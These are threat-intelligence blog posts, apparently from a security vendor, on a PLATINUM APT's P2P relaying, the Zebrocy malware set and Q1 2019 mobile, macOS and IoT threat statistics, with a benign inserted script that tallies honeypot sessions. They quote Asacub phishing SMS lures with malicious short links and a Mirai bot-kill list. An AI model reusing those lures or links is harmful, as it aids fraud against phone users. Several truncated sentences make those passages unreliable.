The creators of the malware also provide the ability to combine infected victims into a P2P network. This can help the attacker, for example, when two infected victims share the same local network, but only one of them has access to the internet. In this case, the attacker can send a command file to the unreachable victim via the reachable one. The instruction for the reachable victim that the command is intended for the other host is placed directly inside the command file. When the attacker prepares the file, a list of infected hosts involved in transferring the file to the destination is included as the h1, h2, h3, etc. options. The order in which the command file will be transferred through the victims to the destination host is included as the p1, p2, etc. options. For example, if the p1 option equals ‘2->3->1’ and the p2 option equals ‘2->3->4’, the command file will be delivered to the hosts with the indexes 1 and 4 through hosts 2 and then 3. Each host is described as follows: %Host IP%:%Host ProbePort%:%Host TransferPort%.

Conclusion

We have discovered a new attack by this group and noted that the actors are still working on improving their malicious utility and using new techniques for making the APT stealthier. A couple of years ago, we predicted that more and more APT and malware developers would use steganography, and here is proof: the actors used two interesting steganography techniques in this APT. One more interesting detail is that the actors decided to implement the utilities they need as one huge set – this reminds us of the framework-based architecture that is becoming more and more popular. Finally, based on the custom cryptor used by the actors, we have been able to attribute this attack to the notorious PLATINUM group, which means this group is still active.

IoCs

This list includes only IoCs related to the described modules of the attack. All IoCs are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com)


Zebrocy’s Multilanguage Malware Salad

3 June, 2019 - 16:00

Zebrocy is a Russian-speaking APT that presents a strange set of stripes. To keep things simple, there are three things to know about Zebrocy:

  • Zebrocy is an active sub-group of victim profiling and access specialists
  • Zebrocy maintains a lineage back through 2013, sharing malware artefacts and similarities with BlackEnergy
  • The past five years of Zebrocy infrastructure, malware set, and targeting have similarities and overlaps with both the Sofacy and

Zebrocy shares data points and crosses lines with other clusters of activity in unique and unexpected ways. Zebrocy initially shared limited infrastructure, targets, and interests with Sofacy. Zebrocy also shared malware code with past BlackEnergy/Sandworm; and targeting, and later very limited infrastructure with more recent BlackEnergy/GreyEnergy. Oddly, Turla deployed spearphish macros almost identical to previous, non-public Zebrocy code in 2018.

It’s fantastic to see some of these same points being repeated publicly by other research teams. A previous claim that Zebrocy distributed Sofacy’s XAgent as a second stage implant remains unsubstantiated but now is replaced with findings identical to these following the SAS2019 presentation, so it seems we are all slowly getting on the same page.

A first course with new additions

When we originally documented a Zebrocy malware incident in late 2015, we noted an Oct 2015 AutoIT downloader and a Delphi backdoor payload. Since then, we have noted a virtual salad of Zebrocy code tossed together, built with a handful of languages, often ripped from various code sharing sites. Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits. Browser credential theft, keylogging, and Windows credential theft, along with some incidents of file and communications theft, are all on the list of Zebrocy second stage implant specials.

This Zebrocy dish is served before the main course – gaining and maintaining access is not an easy job. And, because the group seems to maintain lineage in both the 0day capable and destructive BlackEnergy/Sandworm APT and the prolific and 0day capable Sofacy APT, this course is very interesting. Let’s take a more intelligent perspective on the Zebrocy malware set and activity and its lineage, based on reporting provided to our

Since the SAS2019 presentation, we have identified a new Zebrocy backdoor family, deployed with a new downloader. So Zebrocy continues to expand its malware set. There appears to be both a return to C coding for the group, and also an expansion with the

A set of Zebrocy related events best characterize years of the activity and help to carve out the group’s own profile, its lineage, malware set, infrastructure, and modus operandi.

  • Zebrocy lineage – early Sofacy infrastructure overlap (late 2015/early 2016) for the Zebrocy Delphi backdoor
  • Zebrocy lineage – Delphocy Delphi deployment and abrupt conclusion (2013 – late 2015), and start of Zebrocy Delphi timeline (late 2015)
  • Zebrocy lineage – shared, unique kernel code between BlackEnergy and Delphocy bootkit (2013 – 2015)
  • Zebrocy unique malware set – vintage Delphi programming coupled with unusual and agile development capabilities with new managed languages like Python, C#, and Go all perform screengrab anchor, volume serial number id, systeminfo and process list collection
  • Zebrocy ongoing targeting and infrastructure overlap – fairly recent
    • The full 2018 decline of SPLM/XAgent for the more traditional “Sofacy” activity
    • A coincidental new increase in Zebrocy activity
    • Shared build-id format with BlackEnergy modules
    • An expansion in Zebrocy spearphishing
    • An expansion in the managed languages the Zebrocy malware set is built on

These predictions later turned into global events, as lighter targeting turned into a massive global surge of Zebrocy activity, sometimes sharing targets between both Sofacy and Zebrocy. Also later that year, the Zebrocy malware set expanded with C#, Python, and Go. This wouldn’t be the first or last time we reported on this group’s innovative malware set.

Zebrocy Delphi backdoor shared artefacts rooted in Delphocy and BlackEnergy

The limited set of 2013-2015 Delphocy intrusions in Ukraine and Poland deployed a Delphi backdoor both with and without a bootkit loader. This bootkit loader included a routine that shares the same compiled code with only the BlackEnergy kernel loaders, helping to tie Zebrocy malware to the BlackEnergy malware set.

This unique encryption implementation was shared between BlackEnergy’s kernel loader, and Delphocy’s bootkit kernel loader code. The appearance of this code overlap coincides with several project events:

  • End of Delphocy/BlackEnergy overlapped code use, while BlackEnergy moved forward with other code
  • End of Delphocy’s user-mode Delphi payload (October 2015)
  • Start of Zebrocy’s Delphi payload (October 2015)

A particular chunk of kernel mode code for a custom encryption routine was shared across the older Delphocy bootkit and the BlackEnergy malware platform in 2013. While Delphocy replaced this bootkit with a simplified user-mode persistence technique, BlackEnergy malware continued using this code until late 2015. Then, these APTs discontinued both the Delphi-based Delphocy project and the use of this mysterious chunk of code within BlackEnergy malware. Almost immediately, Delphi-based Zebrocy backdoors began to be deployed. Several months later, a Zebrocy backdoor connected back to a domain that was registered by a particular email address. This address had been used to register another Sofacy domain hosted on a well-known Sofacy IP at the time (rammatica[.]com/raveston[.]com).

      Note that both Delphocy’s and BlackEnergy’s kernel mode code appropriated unique content in 2013 from the Carberp codebase – hashing, injection, bootkit functionality. Surprisingly, this same unique encryption cipher was seen pasted again into 2018 VPNFilter code as well. Clearly it happens with other malware, but Zebrocy’s consistent copy/paste tendency is something not frequently seen in other APT malware with a “best use” date spanning five years or more. Portions of its AutoIT code were copied from code sharing forums and pasted into their own code. This is different from Sofacy’s disappeared and exhaustive SPLM/XAgent codebase. It was used for at least six years and was entirely custom-built.

      Zebrocy’s mix

      The Zebrocy malware set is tossed together from a wide set of languages and technologies, including both legitimate and malicious code shared on online forums and sites like Github and Pastebin. This repeated “copy/paste” practice is not frequently seen in Russian speaking APT malware sets, although

      C# Zebrocy backdoor

      Zebrocy pushed a C# backdoor that maintains much the same functionality as its other assortment of backdoor implementations.

      Most interesting in this implementation is its consistent collection of screengrab and system information, and a list of running processes. Again, with this first stage backdoor, it is profiling its targets and looking for unexpected sources of credential collection to develop bespoke second stage credential harvesters against. Additionally, Zebrocy wheeled out a

      A second stage

      These findings were particularly interesting in the light of past claims about SPLM/XAgent being the second stage of choice for Zebrocy, for which there was a lot of monitoring on our part, but never any data support. Some guesses were made about why that was, perhaps Zebrocy downloaders were all mitigated prior to attempting to download further stages? But never any answers.

      Instead, we arrived at the answers ourselves. In order to account for unexpected software installations at victim systems, no matter which language, each first stage backdoor implementation collects a “system information” listing, screengrab, and enumerates running processes. This malware behavior was included in Zebrocy backdoors from the very first backdoor that we reported on, and continued into 2019 with the latest rounds of Go backdoors. After collected information is POSTed to the C2, a long delay ensues. Eventually, target systems may receive a custom built second stage implant to retrieve credentials from those unexpected software sources. More unusual software packages included little-known customized Chromium builds like CentBrowser and 7Star from Asian studios. In some cases, malware password stealers are deployed to address more common software.

      In addition, Zebrocy file content stealers and keyloggers coded in C# were detected at targets in 2017 and 2018. Some of this code and their build id value format was reviewed in the SAS2018 “Masha and these Bears” presentation.

      Served cold

      Zebrocy version 2.2 called back to a domain sharing Whois and hosting resources with Sofacy in early 2016, and later versions used naming and URL constructs very similar to BlackEnergy resources. And since then, just like BlackEnergy, mostly all of the Zebrocy C2 used no domain registrations. Communications directly to the host over IPv4 with no domain resolution are common behavior for the group’s malware. However, every now and then, Zebrocy malware calls back to servers located by hardcoded domain names.

      Its ongoing activity demonstrates a long-game commitment to gaining access to targeted networks. As we predicted at SAS2018 and SAS2019, this latest Nim coding adds to the growing list of languages used in this malware set. We will see more from Zebrocy into 2019 against government and military related organizations.

IT threat evolution Q1 2019. Statistics

23 May, 2019 - 12:00

These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network,

  • Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
  • 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 243,604 users.
  • Ransomware attacks were defeated on the computers of 284,489 unique users.
  • Our File Anti-Virus detected 247,907,593 unique malicious and potentially unwanted objects.
  • Kaspersky Lab products for mobile devices detected:
    • 905,174 malicious installation packages
    • 29,841 installation packages for mobile banking Trojans
    • 27,928 installation packages for mobile ransomware Trojans
Mobile threats

Quarterly highlights

Q1 2019 is remembered mainly for mobile financial threats.

First, the operators of the Russia-targeting Asacub Trojan made several large-scale distribution attempts, reaching up to 13,000 unique users per day. The attacks used active bots to send malicious links to contacts in already infected smartphones. The mailings contained one of the following messages:

{Name of victim}, you received a new mms: ____________________________ from {Name of victim’s contact}
{Name of victim}, the mms: smsfn.pro/3ftjR was received from {Name of victim’s contact}
{Name of victim}, photo: smslv.pro/c0Oj0 received from {Name of victim’s contact}
{Name of victim}, you have an mms notification ____________________________ from {Name of victim’s contact}

Second, the start of the year saw a rise in the number of malicious apps in the Google Play store aimed at stealing credentials from users of Brazilian online banking apps.

Although such malware appeared on the most popular app platform, the number of downloads was extremely low. We are inclined to believe that cybercriminals are having problems luring victims to pages with malicious apps.

Mobile threat statistics

In Q1 2019, Kaspersky Lab detected 905,174 malicious installation packages, which is 95,845 packages down on the previous quarter.


Number of detected malicious installation packages, Q2 2018 – Q1 2019 (download)

Distribution of detected mobile apps by type


Distribution of newly detected mobile apps by type, Q4 2018 and Q1 2019 (download)

Among all the threats detected in Q1 2019, the lion’s share went to potentially unsolicited RiskTool apps with 29.80%, a fall of 19 p.p. against the previous quarter. The most frequently encountered objects came from the RiskTool.AndroidOS.Dnotua (28% of all detected threats of this class), RiskTool.AndroidOS.Agent (27%), and RiskTool.AndroidOS.SMSreg (16%) families.

In second place were threats in the Trojan-Dropper class (24.93%), whose share increased by 13 p.p. The vast majority of files detected belonged to the Trojan-Dropper.AndroidOS.Wapnor families (93% of all detected threats of this class). Next came the Trojan-Dropper.AndroidOS.Agent (3%) and Trojan-Dropper.AndroidOS.Hqwar (2%) families, and others.

The share of advertising apps (adware) doubled compared to Q4 2018. The AdWare.AndroidOS.Agent (44.44% of all threats of this class), AdWare.AndroidOS.Ewind (35.93%), and AdWare.AndroidOS.Dnotua (4.73%) families were the biggest contributors.

The statistics show a significant rise in the number of mobile financial threats in Q1 2019. Whereas in Q4 2018 the share of mobile banking Trojans was 1.85% of all detected threats, in Q1 2019 the figure stood at 3.24%.

The most frequently created objects belonged to the Trojan-Banker.AndroidOS.Svpeng (20% of all detected mobile bankers), Trojan-Banker.AndroidOS.Asacub (18%), and Trojan-Banker.AndroidOS.Agent (15%) families.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware.

     Verdict                                 %*
 1   DangerousObject.Multi.Generic           54.26
 2   Trojan.AndroidOS.Boogr.gsh              12.72
 3   Trojan-Banker.AndroidOS.Asacub.snt       4.98
 4   DangerousObject.AndroidOS.GenericML      4.35
 5   Trojan-Banker.AndroidOS.Asacub.a         3.49
 6   Trojan-Dropper.AndroidOS.Hqwar.bb        3.36
 7   Trojan-Dropper.AndroidOS.Lezok.p         2.60
 8   Trojan-Banker.AndroidOS.Agent.ep         2.53
 9   Trojan.AndroidOS.Dvmap.a                 1.84
10   Trojan-Banker.AndroidOS.Svpeng.q         1.83
11   Trojan-Banker.AndroidOS.Asacub.cp        1.78
12   Trojan.AndroidOS.Agent.eb                1.74
13   Trojan.AndroidOS.Agent.rt                1.72
14   Trojan-Banker.AndroidOS.Asacub.ce        1.70
15   Trojan-SMS.AndroidOS.Prizmes.a           1.66
16   Exploit.AndroidOS.Lotoor.be              1.59
17   Trojan-Dropper.AndroidOS.Hqwar.gen       1.57
18   Trojan-Dropper.AndroidOS.Tiny.d          1.51
19   Trojan-Banker.AndroidOS.Svpeng.ak        1.49
20   Trojan.AndroidOS.Triada.dl               1.47

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked.

As is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

In second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system based on machine learning.

Third place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).

The DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab’s infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company’s security solutions before such files go for processing. The latest threat patterns are now detected this way.

Sixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.

Seventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:

  • It is extremely difficult for an ordinary user to determine whether their device is already infected.
  • Getting rid of such malware is highly complex.

The Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.

The last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.

Geography of mobile threats


Map of mobile malware infection attempts, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile malware:

     Country*      %**
 1   Pakistan      37.54
 2   Iran          31.55
 3   Bangladesh    28.38
 4   Algeria       24.03
 5   Nigeria       22.59
 6   India         21.53
 7   Tanzania      20.71
 8   Indonesia     17.16
 9   Kenya         16.27
10   Mexico        12.01

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

Pakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.

Second place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy – the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.

Third place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.

Mobile banking Trojans

In the reporting period, we detected 29,841 installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.

The greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.


Number of installation packages for mobile banking Trojans, Q2 2018 – Q1 2019 (download)

     Verdict                               %*
 1   Trojan-Banker.AndroidOS.Asacub.snt    23.32
 2   Trojan-Banker.AndroidOS.Asacub.a      16.35
 3   Trojan-Banker.AndroidOS.Agent.ep      11.82
 4   Trojan-Banker.AndroidOS.Svpeng.q       8.57
 5   Trojan-Banker.AndroidOS.Asacub.cp      8.33
 6   Trojan-Banker.AndroidOS.Asacub.ce      7.96
 7   Trojan-Banker.AndroidOS.Svpeng.ak      7.00
 8   Trojan-Banker.AndroidOS.Agent.eq       4.96
 9   Trojan-Banker.AndroidOS.Asacub.ar      2.47
10   Trojan-Banker.AndroidOS.Hqwar.t        2.10

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by banking threats.

This time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.

It was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals’ transition to a two-stage system of infection using Hqwar droppers.


Geography of mobile banking threats, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile banking Trojans:

     Country*        %**
 1   Australia       0.81
 2   Turkey          0.73
 3   Russia          0.64
 4   South Africa    0.35
 5   Ukraine         0.31
 6   Tajikistan      0.25
 7   Armenia         0.23
 8   Kyrgyzstan      0.17
 9   US              0.16
10   Moldova         0.16

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

In Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Neither type of malware is exclusive to Australia; both are used for attacks worldwide.

Second place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.

Russia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.

Mobile ransomware

In Q1 2019, we detected 27,928 installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.


Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 – Q1 2019) (download)

     Verdict                               %*
 1   Trojan-Ransom.AndroidOS.Svpeng.ah     28.91
 2   Trojan-Ransom.AndroidOS.Rkor.h        19.42
 3   Trojan-Ransom.AndroidOS.Svpeng.aj      9.46
 4   Trojan-Ransom.AndroidOS.Small.as       8.81
 5   Trojan-Ransom.AndroidOS.Rkor.snt       5.36
 6   Trojan-Ransom.AndroidOS.Svpeng.ai      5.21
 7   Trojan-Ransom.AndroidOS.Small.o        3.24
 8   Trojan-Ransom.AndroidOS.Fusob.h        2.74
 9   Trojan-Ransom.AndroidOS.Small.ce       2.49
10   Trojan-Ransom.AndroidOS.Svpeng.snt     2.33

* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile security solutions that were attacked by ransomware.

In Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.


Geography of mobile ransomware, Q1 2019 (download)

Top 10 countries by share of users attacked by mobile ransomware:

     Country*        %**
 1   US              1.54
 2   Kazakhstan      0.36
 3   Iran            0.28
 4   Pakistan        0.14
 5   Mexico          0.10
 6   Saudi Arabia    0.10
 7   Canada          0.07
 8   Italy           0.07
 9   Indonesia       0.05
10   Belgium         0.05

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab’s mobile security solutions in this country.

The Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%).

Attacks on Apple macOS

On the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.

The modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:

  1. The code that displays the advertising banner to run as often as possible on the infected machine,
  2. The victim to click on the banners as often as possible,
  3. As many victims as possible.

It should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.

Top 20 threats for macOS

     Verdict                               %*
 1   Trojan-Downloader.OSX.Shlayer.a       24.62
 2   AdWare.OSX.Spc.a                      20.07
 3   AdWare.OSX.Pirrit.j                   10.31
 4   AdWare.OSX.Pirrit.p                    8.44
 5   AdWare.OSX.Agent.b                     8.03
 6   AdWare.OSX.Pirrit.o                    7.45
 7   AdWare.OSX.Pirrit.s                    6.88
 8   AdWare.OSX.Agent.c                     6.03
 9   AdWare.OSX.MacSearch.a                 5.95
10   AdWare.OSX.Cimpli.d                    5.72
11   AdWare.OSX.Mcp.a                       5.71
12   AdWare.OSX.Pirrit.q                    5.55
13   AdWare.OSX.MacSearch.d                 4.48
14   AdWare.OSX.Agent.a                     4.39
15   Downloader.OSX.InstallCore.ab          3.88
16   AdWare.OSX.Geonei.ap                   3.75
17   AdWare.OSX.MacSearch.b                 3.48
18   AdWare.OSX.Geonei.l                    3.42
19   AdWare.OSX.Bnodlero.q                  3.33
20   RiskTool.OSX.Spigot.a                  3.12

* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s security solutions for macOS that were attacked.

Trojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.

AdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various “cleaner” programs for macOS. After installation, they write themselves to the autoloader and run in the background.

Members of the AdWare.OSX.Pirrit family add extensions to the victim’s browser; some versions also install a proxy server on the victim’s machine to intercept traffic from the browser. All this serves one purpose – to inject advertising into web pages viewed by the user.

The malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.

AdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim’s browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user’s knowledge.

AdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim’s browser.

The creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.

The AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs obfuscation techniques of its creators’ own design to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.

Like other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user’s browser, and changes the default search engine and home page. What’s more, it can download and install other advertising apps.

Threat geography

     Country*    %**
 1   France      11.54
 2   Spain        9.75
 3   India        8.83
 4   Italy        8.20
 5   US           8.03
 6   Canada       7.94
 7   UK           7.52
 8   Russia       7.51
 9   Brazil       7.45
10   Mexico       6.99

* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s security solutions for macOS (under 10,000).
** Unique attacked users as a percentage of all users of Kaspersky Lab’s security solutions for macOS in the country.

In Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.

Users from Spain (9.75%), India (8.83%), and Italy (8.20%) – who ranked second, third, and fourth, respectively – most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.

Fifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.

IoT attacks

Interesting events

In Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive – scanning for the presence of procfs – but we expect it to become more complex in the near future.

Second, one of the versions of Mirai was found to contain a mechanism for clearing the environment of other bots. It works from a list of name templates, killing any process whose name matches one of them. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain “mirai” in its process name):

  • dvrhelper
  • dvrsupport
  • mirai
  • blade
  • demon
  • hoho
  • hakai
  • satori
  • messiah
  • mips

Lastly, a few words about a miner with an old exploit for Oracle WebLogic Server, although it is not actually IoT malware but a Linux Trojan.

Taking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.

Section of code responsible for attacking Windows and Linux hosts

IoT threat statistics

Q1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that this has nothing to do with the properties of the protocol itself. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come.

SSH       17%
Telnet    83%

Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019

Nevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab’s traps.

SSH       64%
Telnet    36%

Table of distribution of cybercriminal working sessions with Kaspersky Lab’s traps, Q1 2019

If attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.
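The two tables above split the same honeypot activity in two different ways, by distinct attacking addresses and by sessions, which is why a protocol can dominate one and trail in the other. The following Python script is an added illustration of that methodology, not Kaspersky Lab's own trap code; the session log lines are constructed samples (five telnet sessions from five addresses, ten SSH sessions from two addresses).

```python
import re
from collections import Counter, defaultdict

# Constructed honeypot session records for illustration (not real trap
# data): one line per session, "<timestamp> <service> <source IP>".
# Five telnet sessions arrive from five different addresses, while ten
# SSH sessions come from only two addresses.
SAMPLE_LOG = """\
2019-02-01T10:00:01Z telnet 203.0.113.10
2019-02-01T10:00:05Z telnet 203.0.113.11
2019-02-01T10:00:09Z telnet 203.0.113.12
2019-02-01T10:00:15Z telnet 203.0.113.13
2019-02-01T10:00:20Z telnet 203.0.113.14
2019-02-01T10:01:00Z ssh 198.51.100.7
2019-02-01T10:01:30Z ssh 198.51.100.7
2019-02-01T10:02:00Z ssh 198.51.100.7
2019-02-01T10:02:30Z ssh 198.51.100.7
2019-02-01T10:03:00Z ssh 198.51.100.7
2019-02-01T10:03:30Z ssh 198.51.100.7
2019-02-01T10:04:00Z ssh 198.51.100.7
2019-02-01T10:04:30Z ssh 198.51.100.7
2019-02-01T10:05:00Z ssh 198.51.100.8
2019-02-01T10:05:30Z ssh 198.51.100.8
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<service>telnet|ssh)\s+"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)


def parse_sessions(text):
    """Parse session lines into (timestamp, service, ip) tuples.

    Malformed lines are skipped and counted rather than silently
    dropped, so a corrupted record cannot distort the percentages
    without anyone noticing.
    """
    sessions, skipped = [], 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            skipped += 1
            continue
        sessions.append((m["ts"], m["service"], m["ip"]))
    return sessions, skipped


def _percentages(counts):
    """Turn {service: count} into {service: share in %}, rounded to 2 dp."""
    total = sum(counts.values())
    if total == 0:
        return {}
    return {svc: round(100.0 * n / total, 2) for svc, n in counts.items()}


def share_by_unique_ip(sessions):
    """Share of each service by number of distinct attacking addresses
    (the basis of the first table above)."""
    ips = defaultdict(set)
    for _, service, ip in sessions:
        ips[service].add(ip)
    return _percentages({svc: len(s) for svc, s in ips.items()})


def share_by_sessions(sessions):
    """Share of each service by number of sessions
    (the basis of the second table above)."""
    return _percentages(Counter(service for _, service, _ in sessions))


def sessions_per_address(sessions):
    """Average sessions per distinct address, per service. A high value
    points at a few persistent (server-class) sources rather than many
    one-shot infected devices."""
    per_svc = defaultdict(Counter)
    for _, service, ip in sessions:
        per_svc[service][ip] += 1
    return {svc: round(sum(c.values()) / len(c), 2)
            for svc, c in per_svc.items()}


if __name__ == "__main__":
    sessions, skipped = parse_sessions(SAMPLE_LOG)
    print("skipped malformed lines:", skipped)
    print("by unique IP:   ", share_by_unique_ip(sessions))
    print("by sessions:    ", share_by_sessions(sessions))
    print("sessions per IP:", sessions_per_address(sessions))
```

On the constructed input telnet wins by unique addresses (71.43% vs 28.57%) while SSH wins by sessions (66.67% vs 33.33%), the same inversion the two tables above show.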

Telnet-based attacks


Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab’s telnet traps, Q1 2019 (download)

Top 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab’s traps.

     Country    %*
 1   Egypt      13.46
 2   China      13.19
 3   Brazil     11.09
 4   Russia      7.17
 5   Greece      4.45
 6   Jordan      4.14
 7   US          4.12
 8   Iran        3.24
 9   India       3.14
10   Turkey      2.49

* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet.

